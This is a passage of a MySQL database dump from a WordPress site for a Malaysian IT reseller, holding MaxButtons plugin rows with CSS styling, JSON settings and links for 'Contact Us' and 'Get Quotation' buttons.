  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_maxbuttonsv3`
--

LOCK TABLES `wpdp_maxbuttonsv3` WRITE;
/*!40000 ALTER TABLE `wpdp_maxbuttonsv3` DISABLE KEYS */;
INSERT INTO `wpdp_maxbuttonsv3` (`id`, `name`, `status`, `cache`, `basic`, `color`, `dimension`, `border`, `gradient`, `text`, `container`, `advanced`, `responsive`, `meta`, `updated`, `created`) VALUES (1,'Contact Us','publish','.maxbutton-1.maxbutton.maxbutton-contact-us{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-1.maxbutton.maxbutton-contact-us:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-1.maxbutton.maxbutton-contact-us .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-1.maxbutton.maxbutton-contact-us:hover .mb-text{color:#1e73be}','{\"name\":\"Contact Us\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/contact-us\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Contact Us\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1544520716,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-10 18:09:04'),(2,'Contact Us','trash',NULL,'{\"name\":\"Contact Us\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/contact-us\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Contact Us\",\"font\":\"Arial\",\"font_size\":19,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":1544494147,\"modified\":1544494147,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-02-07 02:03:59','2018-12-10 18:09:07'),(3,'Get Quotation Logitech','publish','.maxbutton-3.maxbutton.maxbutton-get-quotation-logitech{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-3.maxbutton.maxbutton-get-quotation-logitech:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-3.maxbutton.maxbutton-get-quotation-logitech .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-3.maxbutton.maxbutton-get-quotation-logitech:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Logitech\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1544520849,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-11 01:32:19'),(4,'View Product Panasonic Toughbook','publish','.maxbutton-4.maxbutton.maxbutton-view-product-panasonic-toughbook{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-4.maxbutton.maxbutton-view-product-panasonic-toughbook:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-4.maxbutton.maxbutton-view-product-panasonic-toughbook .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-4.maxbutton.maxbutton-view-product-panasonic-toughbook:hover .mb-text{color:#1e73be}','{\"name\":\"View Product Panasonic Toughbook\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/panasonic-toughbook-product\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"View Product\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545273424,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-19 18:34:17'),(5,'Get Quotation PANASONIC TOUGHBOOK','publish','.maxbutton-5.maxbutton.maxbutton-get-quotation-panasonic-toughbook{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-5.maxbutton.maxbutton-get-quotation-panasonic-toughbook:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-5.maxbutton.maxbutton-get-quotation-panasonic-toughbook .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-5.maxbutton.maxbutton-get-quotation-panasonic-toughbook:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation PANASONIC TOUGHBOOK\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-panasonic-toughbook\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545275550,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-19 19:11:17'),(6,'Get Quotation D-Link','publish','.maxbutton-6.maxbutton.maxbutton-get-quotation-d-link{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-6.maxbutton.maxbutton-get-quotation-d-link:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-6.maxbutton.maxbutton-get-quotation-d-link .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-6.maxbutton.maxbutton-get-quotation-d-link:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation D-Link\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-d-link\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545288712,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-19 22:51:24'),(7,'Get Quotation Acer','publish','.maxbutton-7.maxbutton.maxbutton-get-quotation-acer{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-7.maxbutton.maxbutton-get-quotation-acer:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-7.maxbutton.maxbutton-get-quotation-acer .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-7.maxbutton.maxbutton-get-quotation-acer:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Acer\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-acer\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545289808,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-19 23:09:50'),(8,'Get Quotation Asus','publish','.maxbutton-8.maxbutton.maxbutton-get-quotation-asus{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-8.maxbutton.maxbutton-get-quotation-asus:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-8.maxbutton.maxbutton-get-quotation-asus .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-8.maxbutton.maxbutton-get-quotation-asus:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Asus\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-asus\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545296672,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-20 01:04:13'),(15,'Get Quotation Dell Large Display','publish','.maxbutton-15.maxbutton.maxbutton-get-quotation-dell-large-display{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-15.maxbutton.maxbutton-get-quotation-dell-large-display:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-15.maxbutton.maxbutton-get-quotation-dell-large-display .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-15.maxbutton.maxbutton-get-quotation-dell-large-display:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Dell Large Display\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-dell\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get 